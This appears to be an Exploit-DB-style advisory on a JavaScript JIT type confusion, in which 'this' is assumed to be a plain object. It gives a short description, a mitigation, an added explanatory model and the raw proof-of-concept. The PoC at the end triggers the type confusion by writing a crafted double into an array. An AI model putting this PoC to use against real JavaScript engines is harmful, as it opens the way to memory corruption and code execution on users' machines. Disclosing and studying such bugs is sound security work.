Vendor: N/A
By: Anonymous
CVSS: 8.8 (HIGH)
CWE: 843 (Type Confusion)
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: JavaScript
2020

Type Confusion in JavaScript

This vulnerability occurs when the value type of the 'this' object is assumed to be "Object", although 'this' can be another kind of object, such as an array. As a result, operations on 'this' are not checked properly, which leads to type confusion. The PoC code shows how this vulnerability can be exploited by calling the opt() function with an array as the 'this' object.

Mitigation:

Ensure that the type of the 'this' object is properly checked before performing any operations on it.
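
A simplified model of the missed check, as an added example that is not part of the original advisory or of any engine's code. ModelArray, storeToThis, compileOpt and run are hypothetical names, and the 'float'/'var' storage kinds are an assumed stand-in for the array representations an engine distinguishes; the model shows that typing 'this' as "Object" lets the final store skip its check, while "LikelyObject" forces the re-check.

```javascript
// Simplified model, constructed for illustration; not code from any engine.
// 'float' arrays hold raw doubles; 'var' arrays hold tagged values.
class ModelArray {
  constructor(vals) { this.kind = 'float'; this.slots = vals.slice(); }
  // Generic checked store: converts the storage when a non-number arrives.
  storeChecked(i, v) {
    if (this.kind === 'float' && typeof v !== 'number') {
      this.kind = 'var';
      this.slots = this.slots.map(d => ({ tagged: d }));
    }
    this.slots[i] = this.kind === 'float' ? v : { tagged: v };
  }
  // Fast path used when the compiler believes kind === 'float': no check.
  storeRawDouble(i, d) { this.slots[i] = d; }
  // A 'var' array holding an untagged double is the type-confused state.
  isConfused() {
    return this.kind === 'var' && this.slots.some(s => typeof s === 'number');
  }
}

// Store to `this`, which may be a plain object or a ModelArray.
function storeToThis(thisObj, i, v) {
  if (thisObj instanceof ModelArray) thisObj.storeChecked(i, v);
  else thisObj[i] = v;
}

// "Compiles" opt() under the value type assumed for `this`.
function compileOpt(thisValueType) {
  // Definite "Object": the store to `this` is assumed unable to change an
  // array, so the 'float' fact about arr is kept and not re-checked.
  const recheck = thisValueType !== 'Object';
  return function opt(thisObj, arr) {
    arr.storeChecked(0, 1.1);                  // arr[0] = 1.1
    storeToThis(thisObj, 0, {});               // this[0] = {}
    if (recheck && arr.kind !== 'float') arr.storeChecked(0, 2.3023e-320);
    else arr.storeRawDouble(0, 2.3023e-320);   // arr[0] = 2.3023e-320
    return arr;
  };
}

// Same call pattern as the PoC: plain-object `this`, then the array itself.
function run(thisValueType) {
  const opt = compileOpt(thisValueType);
  const arr = new ModelArray([1.1]);
  for (let i = 0; i < 100; i++) opt({}, arr);
  return opt(arr, arr).isConfused();
}
```

run('Object') reports the confused state and run('LikelyObject') does not, because only the second variant re-checks the array's storage kind after the store to 'this'.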

Exploit-DB raw data:

/*
LdThis instructions' value type is assumed to be "Object". Since "this" can be other objects like an array, it has to be assumed to be "LikelyObject", otherwise, operations to "this" will not be checked properly.

PoC:
*/

function opt(arr) {
    arr[0] = 1.1;
    this[0] = {};
    arr[0] = 2.3023e-320;
}

function main() {
    let arr = [1.1];
    for (let i = 0; i < 10000; i++) {
        opt.call({}, arr);
    }

    opt.call(arr, arr);
    print(arr);
}

main();